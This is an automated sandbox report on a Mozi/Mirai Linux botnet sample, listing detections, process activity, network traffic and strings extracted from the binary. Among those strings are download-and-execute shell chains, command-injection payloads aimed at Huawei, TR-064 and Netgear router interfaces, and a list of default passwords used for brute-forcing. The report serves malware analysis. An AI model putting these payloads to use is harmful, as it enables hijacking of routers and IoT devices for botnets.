Edit tour

Linux Analysis Report
Mozi.m.elf

Overview

General Information

Sample name:Mozi.m.elf
Analysis ID:1651019
MD5:a418ef994dc1f9159012ea97c9d99834
SHA1:aa6710a73df21e364d59785fc0d3f03b9783b880
SHA256:caaff8c0f1d39424f4f3c55f5199bd709d78e343bc6050ed62d91bd6282df552
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:96
Range:0 - 100

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Mirai
Executes the "rm" command used to delete files or directories
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings indicative of password brute-forcing capabilities
Sample contains strings that are potentially command strings
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1651019
Start date and time:2025-03-28 11:03:26 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 22s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:Mozi.m.elf
Detection:MAL
Classification:mal96.troj.linELF@0/0@2/0
Command:/tmp/Mozi.m.elf
PID:5430
Exit Code:135
Exit Code Info:
Killed:False
Standard Output:

Standard Error:
  • system is lnxubuntu20
  • dash New Fork (PID: 5408, Parent: 3588)
  • rm (PID: 5408, Parent: 3588, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.23fD2FP8ru /tmp/tmp.RgLKVlZJ0J /tmp/tmp.5lf3Du1i2X
  • dash New Fork (PID: 5409, Parent: 3588)
  • cat (PID: 5409, Parent: 3588, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /tmp/tmp.23fD2FP8ru
  • dash New Fork (PID: 5410, Parent: 3588)
  • head (PID: 5410, Parent: 3588, MD5: fd96a67145172477dd57131396fc9608) Arguments: head -n 10
  • dash New Fork (PID: 5411, Parent: 3588)
  • tr (PID: 5411, Parent: 3588, MD5: fbd1402dd9f72d8ebfff00ce7c3a7bb5) Arguments: tr -d \\000-\\011\\013\\014\\016-\\037
  • dash New Fork (PID: 5412, Parent: 3588)
  • cut (PID: 5412, Parent: 3588, MD5: d8ed0ea8f22c0de0f8692d4d9f1759d3) Arguments: cut -c -80
  • dash New Fork (PID: 5413, Parent: 3588)
  • cat (PID: 5413, Parent: 3588, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /tmp/tmp.23fD2FP8ru
  • dash New Fork (PID: 5414, Parent: 3588)
  • head (PID: 5414, Parent: 3588, MD5: fd96a67145172477dd57131396fc9608) Arguments: head -n 10
  • dash New Fork (PID: 5415, Parent: 3588)
  • tr (PID: 5415, Parent: 3588, MD5: fbd1402dd9f72d8ebfff00ce7c3a7bb5) Arguments: tr -d \\000-\\011\\013\\014\\016-\\037
  • dash New Fork (PID: 5416, Parent: 3588)
  • cut (PID: 5416, Parent: 3588, MD5: d8ed0ea8f22c0de0f8692d4d9f1759d3) Arguments: cut -c -80
  • dash New Fork (PID: 5417, Parent: 3588)
  • rm (PID: 5417, Parent: 3588, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.23fD2FP8ru /tmp/tmp.RgLKVlZJ0J /tmp/tmp.5lf3Du1i2X
  • Mozi.m.elf (PID: 5430, Parent: 5342, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/Mozi.m.elf
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
Mozi.m.elfJoeSecurity_Mirai_9Yara detected MiraiJoe Security
    Mozi.m.elfJoeSecurity_Mirai_5Yara detected MiraiJoe Security
      Mozi.m.elfJoeSecurity_Mirai_6Yara detected MiraiJoe Security
        Mozi.m.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          Mozi.m.elfLinux_Trojan_Mirai_5c62e6b2unknownunknown
          • 0x3850e:$a: FF C1 83 F9 05 7F 14 48 63 C1 48 89 94 C4 00 01 00 00 FF C6 48
          Click to see the 2 entries
          SourceRuleDescriptionAuthorStrings
          5430.1.00007f26e4060000.00007f26e406a000.rw-.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
            5430.1.00007f26e4017000.00007f26e4058000.r-x.sdmpJoeSecurity_Mirai_9Yara detected MiraiJoe Security
              5430.1.00007f26e4017000.00007f26e4058000.r-x.sdmpJoeSecurity_Mirai_5Yara detected MiraiJoe Security
                5430.1.00007f26e4017000.00007f26e4058000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
                  5430.1.00007f26e4017000.00007f26e4058000.r-x.sdmpLinux_Trojan_Mirai_5c62e6b2unknownunknown
                  • 0x3850e:$a: FF C1 83 F9 05 7F 14 48 63 C1 48 89 94 C4 00 01 00 00 FF C6 48
                  Click to see the 4 entries
                  No Suricata rule has matched

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: Mozi.m.elfAvira: detected
                  Source: Mozi.m.elfVirustotal: Detection: 60%Perma Link
                  Source: Mozi.m.elfReversingLabs: Detection: 52%
                  Source: Mozi.m.elfString: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
                  Source: Mozi.m.elfString: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
                  Source: Mozi.m.elfString: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
                  Source: global trafficTCP traffic: 192.168.2.13:48202 -> 185.125.190.26:443
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.125.190.26
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.125.190.26
                  Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
                  Source: Mozi.m.elfString found in binary or memory: http://%s:%d/Mozi.m
                  Source: Mozi.m.elfString found in binary or memory: http://%s:%d/Mozi.m;
                  Source: Mozi.m.elfString found in binary or memory: http://%s:%d/bin.sh
                  Source: Mozi.m.elfString found in binary or memory: http://%s:%d/bin.sh;chmod
                  Source: Mozi.m.elfString found in binary or memory: http://127.0.0.1
                  Source: Mozi.m.elfString found in binary or memory: http://127.0.0.1sendcmd
                  Source: Mozi.m.elfString found in binary or memory: http://HTTP/1.1
                  Source: Mozi.m.elfString found in binary or memory: http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
                  Source: Mozi.m.elfString found in binary or memory: http://ipinfo.io/ip
                  Source: Mozi.m.elfString found in binary or memory: http://purenetworks.com/HNAP1/
                  Source: Mozi.m.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                  Source: Mozi.m.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                  Source: Mozi.m.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
                  Source: unknownNetwork traffic detected: HTTP traffic on port 48202 -> 443

                  System Summary

                  barindex
                  Source: Mozi.m.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_5c62e6b2 Author: unknown
                  Source: Mozi.m.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_77137320 Author: unknown
                  Source: Mozi.m.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_ac253e4f Author: unknown
                  Source: 5430.1.00007f26e4017000.00007f26e4058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5c62e6b2 Author: unknown
                  Source: 5430.1.00007f26e4017000.00007f26e4058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_77137320 Author: unknown
                  Source: 5430.1.00007f26e4017000.00007f26e4058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_ac253e4f Author: unknown
                  Source: Initial sampleString containing 'busybox' found: busybox
                  Source: Initial sampleString containing 'busybox' found: ..%s/%s/proc/haha/tmp/var/lib/dev/syscfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL "http://127.0.0.1"cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword "acsMozi"iptables -I INPUT -p tcp --destination-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 7547 -j DROPiptables -I OUTPUT -p tcp --source-port 7547 -j DROPiptables -I INPUT -p tcp --dport 35000 -j DROPiptables -I INPUT -p tcp --dport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 35000 -j DROPiptables -I INPUT -p tcp --dport 7547 -j DROPiptables -I OUTPUT -p tcp --sport 7547 -j DROP/mnt/jffs2/Equip.sh%s%s%s%s#!/bin/sh/mnt/jffs2/wifi.sh/mnt/jffs2/WifiPerformance.shbusybox%255s %255s %255s %255s
                  Source: Initial sampleString containing 'busybox' found: /bin/busybox cat /bin/ls|head -n 1
                  Source: Initial sampleString containing 'busybox' found: /bin/busybox hexdump -e '16/1 "%c"' -n 52 /bin/ls
                  Source: Initial sampleString containing 'busybox' found: /bin/busybox cat /bin/ls|more
                  Source: Initial sampleString containing 'busybox' found: "\x%02xsage:/bin/busybox cat /bin/ls|head -n 1
                  Source: Initial sampleString containing 'busybox' found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
                  Source: Initial sampleString containing 'busybox' found: /bin/busybox dd bs=52 count=1 if=/bin/ls || /bin/busybox cat /bin/ls || while read i; do printf $i; done < /bin/ls || while read i; do printf $i; done < /bin/busybox
                  Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)
                  Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
                  Source: Initial sampleString containing 'busybox' found: /bin/busybox echo '%s' %s .i; %s && /bin/busybox echo '%s'
                  Source: Initial sampleString containing 'busybox' found: ./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
                  Source: Initial sampleString containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
                  Source: Initial sampleString containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
                  Source: Initial sampleString containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '%s'
                  Source: Initial sampleString containing 'busybox' found: /bin/busybox wget;/bin/busybox echo -ne '%s'
                  Source: Initial sampleString containing 'busybox' found: ELF.r.c.x.k.p.s.6.m.l.4>>/bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)>.x/bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
                  Source: Initial sampleString containing 'busybox' found: me./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
                  Source: Initial sampleString containing 'busybox' found: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
                  Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s:%d -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: Initial sampleString containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
                  Source: Initial sampleString containing potential weak password found: admin
                  Source: Initial sampleString containing potential weak password found: default
                  Source: Initial sampleString containing potential weak password found: support
                  Source: Initial sampleString containing potential weak password found: service
                  Source: Initial sampleString containing potential weak password found: supervisor
                  Source: Initial sampleString containing potential weak password found: guest
                  Source: Initial sampleString containing potential weak password found: administrator
                  Source: Initial sampleString containing potential weak password found: 123456
                  Source: Initial sampleString containing potential weak password found: 54321
                  Source: Initial sampleString containing potential weak password found: password
                  Source: Initial sampleString containing potential weak password found: 12345
                  Source: Initial sampleString containing potential weak password found: admin1234
                  Source: Initial samplePotential command found: GET /c HTTP/1.0
                  Source: Initial samplePotential command found: GET %s HTTP/1.1
                  Source: Initial samplePotential command found: GET /c
                  Source: Initial samplePotential command found: GET /Mozi.6 HTTP/1.0
                  Source: Initial samplePotential command found: GET /Mozi.7 HTTP/1.0
                  Source: Initial samplePotential command found: GET /Mozi.c HTTP/1.0
                  Source: Initial samplePotential command found: GET /Mozi.m HTTP/1.0
                  Source: Initial samplePotential command found: GET /Mozi.x HTTP/1.0
                  Source: Initial samplePotential command found: GET /Mozi.a HTTP/1.0
                  Source: Initial samplePotential command found: GET /Mozi.s HTTP/1.0
                  Source: Initial samplePotential command found: GET /Mozi.r HTTP/1.0
                  Source: Initial samplePotential command found: GET /Mozi.b HTTP/1.0
                  Source: Initial samplePotential command found: GET /Mozi.4 HTTP/1.0
                  Source: Initial samplePotential command found: GET /Mozi.k HTTP/1.0
                  Source: Initial samplePotential command found: GET /Mozi.l HTTP/1.0
                  Source: Initial samplePotential command found: GET /Mozi.p HTTP/1.0
                  Source: Initial samplePotential command found: GET /%s HTTP/1.1
                  Source: Initial samplePotential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                  Source: Initial samplePotential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IF
                  Source: Mozi.m.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_5c62e6b2 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 39501003c45c89d6a08f71fbf9c442bcc952afc5f1a1eb7b5af2d4b7633698a8, id = 5c62e6b2-9f6a-4c6d-b3fc-c6cbc8cf0b4b, last_modified = 2021-09-16
                  Source: Mozi.m.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_77137320 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = afeedf7fb287320c70a2889f43bc36a3047528204e1de45c4ac07898187d136b, id = 77137320-6c7e-4bb8-81a4-bd422049c309, last_modified = 2021-09-16
                  Source: Mozi.m.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_ac253e4f reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = e2eee1f72b8c2dbf68e57b721c481a5cd85296e844059decc3548e7a6dc28fea, id = ac253e4f-b628-4dd0-91f1-f19099286992, last_modified = 2021-09-16
                  Source: 5430.1.00007f26e4017000.00007f26e4058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5c62e6b2 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 39501003c45c89d6a08f71fbf9c442bcc952afc5f1a1eb7b5af2d4b7633698a8, id = 5c62e6b2-9f6a-4c6d-b3fc-c6cbc8cf0b4b, last_modified = 2021-09-16
                  Source: 5430.1.00007f26e4017000.00007f26e4058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_77137320 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = afeedf7fb287320c70a2889f43bc36a3047528204e1de45c4ac07898187d136b, id = 77137320-6c7e-4bb8-81a4-bd422049c309, last_modified = 2021-09-16
                  Source: 5430.1.00007f26e4017000.00007f26e4058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_ac253e4f reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = e2eee1f72b8c2dbf68e57b721c481a5cd85296e844059decc3548e7a6dc28fea, id = ac253e4f-b628-4dd0-91f1-f19099286992, last_modified = 2021-09-16
                  Source: classification engineClassification label: mal96.troj.linELF@0/0@2/0
                  Source: /usr/bin/dash (PID: 5408)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.23fD2FP8ru /tmp/tmp.RgLKVlZJ0J /tmp/tmp.5lf3Du1i2XJump to behavior
                  Source: /usr/bin/dash (PID: 5417)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.23fD2FP8ru /tmp/tmp.RgLKVlZJ0J /tmp/tmp.5lf3Du1i2XJump to behavior
                  Source: /tmp/Mozi.m.elf (PID: 5430)Queries kernel information via 'uname': Jump to behavior
                  Source: Mozi.m.elf, 5430.1.000055745ed7f000.000055745ee8b000.rw-.sdmpBinary or memory string: ^tU!/etc/qemu-binfmt/arm
                  Source: Mozi.m.elf, 5430.1.000055745ed7f000.000055745ee8b000.rw-.sdmpBinary or memory string: ^tUrg.qemu.gdb.arm.sys.regs">
                  Source: Mozi.m.elf, 5430.1.000055745ed7f000.000055745ee8b000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
                  Source: Mozi.m.elf, 5430.1.00007ffeb297b000.00007ffeb299c000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
                  Source: Mozi.m.elf, 5430.1.00007ffeb297b000.00007ffeb299c000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/Mozi.m.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/Mozi.m.elf
                  Source: Mozi.m.elf, 5430.1.000055745ed7f000.000055745ee8b000.rw-.sdmpBinary or memory string: rg.qemu.gdb.arm.sys.regs">

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: Mozi.m.elf, type: SAMPLE
                  Source: Yara matchFile source: 5430.1.00007f26e4017000.00007f26e4058000.r-x.sdmp, type: MEMORY
                  Source: Yara matchFile source: 5430.1.00007f26e4060000.00007f26e406a000.rw-.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Mozi.m.elf PID: 5430, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: Mozi.m.elf, type: SAMPLE
                  Source: Yara matchFile source: 5430.1.00007f26e4017000.00007f26e4058000.r-x.sdmp, type: MEMORY
                  Source: Yara matchFile source: 5430.1.00007f26e4060000.00007f26e406a000.rw-.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Mozi.m.elf PID: 5430, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information1
                  Scripting
                  Valid Accounts1
                  Command and Scripting Interpreter
                  1
                  Scripting
                  Path Interception1
                  File Deletion
                  1
                  Brute Force
                  11
                  Security Software Discovery
                  Remote ServicesData from Local System1
                  Encrypted Channel
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
                  Non-Application Layer Protocol
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
                  Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  No configs have been found
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Number of created Files
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1651019 Sample: Mozi.m.elf Startdate: 28/03/2025 Architecture: LINUX Score: 96 14 185.125.190.26, 443 CANONICAL-ASGB United Kingdom 2->14 16 daisy.ubuntu.com 2->16 18 Malicious sample detected (through community Yara rule) 2->18 20 Antivirus / Scanner detection for submitted sample 2->20 22 Multi AV Scanner detection for submitted file 2->22 24 Yara detected Mirai 2->24 6 dash rm Mozi.m.elf 2->6         started        8 dash rm 2->8         started        10 dash cut 2->10         started        12 7 other processes 2->12 signatures3 process4
                  SourceDetectionScannerLabelLink
                  Mozi.m.elf60%VirustotalBrowse
                  Mozi.m.elf53%ReversingLabsLinux.Backdoor.Mirai
                  Mozi.m.elf100%AviraEXP/ELF.Mirai.O
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches

                  Download Network PCAP: filteredfull

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  daisy.ubuntu.com
                  162.213.35.25
                  truefalse
                    high
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://%s:%d/bin.sh;chmodMozi.m.elffalse
                      high
                      http://ipinfo.io/ipMozi.m.elffalse
                        high
                        http://schemas.xmlsoap.org/soap/encoding/Mozi.m.elffalse
                          high
                          http://%s:%d/bin.shMozi.m.elffalse
                            high
                            http://purenetworks.com/HNAP1/Mozi.m.elffalse
                              high
                              http://%s:%d/Mozi.m;Mozi.m.elffalse
                                high
                                http://schemas.xmlsoap.org/soap/envelope/Mozi.m.elffalse
                                  high
                                  http://HTTP/1.1Mozi.m.elffalse
                                    high
                                    http://127.0.0.1Mozi.m.elffalse
                                      high
                                      http://baidu.com/%s/%s/%d/%s/%s/%s/%s)Mozi.m.elffalse
                                        high
                                        http://schemas.xmlsoap.org/soap/envelope//Mozi.m.elffalse
                                          high
                                          http://%s:%d/Mozi.mMozi.m.elffalse
                                            high
                                            http://127.0.0.1sendcmdMozi.m.elffalse
                                              high
                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs
                                              IPDomainCountryFlagASNASN NameMalicious
                                              185.125.190.26
                                              unknownUnited Kingdom
                                              41231CANONICAL-ASGBfalse
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              185.125.190.26sync.powerpc.elfGet hashmaliciousUnknownBrowse
                                                na.elfGet hashmaliciousPrometeiBrowse
                                                  na.elfGet hashmaliciousPrometeiBrowse
                                                    arm5.elfGet hashmaliciousUnknownBrowse
                                                      x86.elfGet hashmaliciousMiraiBrowse
                                                        na.elfGet hashmaliciousPrometeiBrowse
                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                            SecuriteInfo.com.ELF.Mirai-AXV.27459.929.elfGet hashmaliciousUnknownBrowse
                                                              arm7.elfGet hashmaliciousUnknownBrowse
                                                                arm5.elfGet hashmaliciousUnknownBrowse
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  daisy.ubuntu.comsshd.elfGet hashmaliciousUnknownBrowse
                                                                  • 162.213.35.25
                                                                  .i.elfGet hashmaliciousUnknownBrowse
                                                                  • 162.213.35.24
                                                                  bimbo-arm6.elfGet hashmaliciousUnknownBrowse
                                                                  • 162.213.35.24
                                                                  resgod.x86.elfGet hashmaliciousMiraiBrowse
                                                                  • 162.213.35.25
                                                                  resgod.arc.elfGet hashmaliciousMiraiBrowse
                                                                  • 162.213.35.24
                                                                  resgod.mips.elfGet hashmaliciousMiraiBrowse
                                                                  • 162.213.35.25
                                                                  resgod.arm6.elfGet hashmaliciousMiraiBrowse
                                                                  • 162.213.35.24
                                                                  resgod.spc.elfGet hashmaliciousMiraiBrowse
                                                                  • 162.213.35.25
                                                                  resgod.m68k.elfGet hashmaliciousMiraiBrowse
                                                                  • 162.213.35.24
                                                                  resgod.arm.elfGet hashmaliciousMiraiBrowse
                                                                  • 162.213.35.25
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  CANONICAL-ASGBna.elfGet hashmaliciousPrometeiBrowse
                                                                  • 91.189.91.42
                                                                  vjwe68k.elfGet hashmaliciousUnknownBrowse
                                                                  • 91.189.91.42
